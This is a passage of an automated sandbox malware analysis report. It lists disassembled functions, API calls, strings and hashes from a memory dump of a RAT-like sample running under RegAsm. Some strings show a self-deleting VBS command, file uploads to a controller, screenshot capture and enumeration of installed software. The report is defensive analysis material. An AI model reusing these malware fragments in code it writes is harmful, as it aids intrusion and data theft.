                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                          • API String ID: 4218353326-230879103
                                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$EnvironmentVariable
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1464849758-0
                                                                                                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumOpen
                                                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                          • API String ID: 1332880857-3714951968
                                                                                                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                          • String ID: Close
                                                                                                                          • API String ID: 1657328048-3535843008
                                                                                                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2509303402-0
                                                                                                                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                          • API String ID: 3086580692-2582957567
                                                                                                                          • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                          • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                                                          • _free.LIBCMT ref: 00451404
                                                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                                                          • _free.LIBCMT ref: 00451447
                                                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                                                          • _free.LIBCMT ref: 00451483
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                          • _free.LIBCMT ref: 10007CFB
                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                          • _free.LIBCMT ref: 10007D1D
                                                                                                                          • _free.LIBCMT ref: 10007D32
                                                                                                                          • _free.LIBCMT ref: 10007D3D
                                                                                                                          • _free.LIBCMT ref: 10007D5F
                                                                                                                          • _free.LIBCMT ref: 10007D72
                                                                                                                          • _free.LIBCMT ref: 10007D80
                                                                                                                          • _free.LIBCMT ref: 10007D8B
                                                                                                                          • _free.LIBCMT ref: 10007DC3
                                                                                                                          • _free.LIBCMT ref: 10007DCA
                                                                                                                          • _free.LIBCMT ref: 10007DE7
                                                                                                                          • _free.LIBCMT ref: 10007DFF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                          • API String ID: 1913171305-3159800282
                                                                                                                          • Opcode ID: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                          • Opcode Fuzzy Hash: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                          • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                          • String ID: H
                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: \&G$\&G$`&G
                                                                                                                          • API String ID: 269201875-253610517
                                                                                                                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 65535$udp
                                                                                                                          • API String ID: 0-1267037602
                                                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2441525078-0
                                                                                                                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                          APIs
                                                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                          • String ID: 02x$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                          • API String ID: 489098229-3777971927
                                                                                                                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                          • GetMessageA.USER32 ref: 0040556F
                                                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
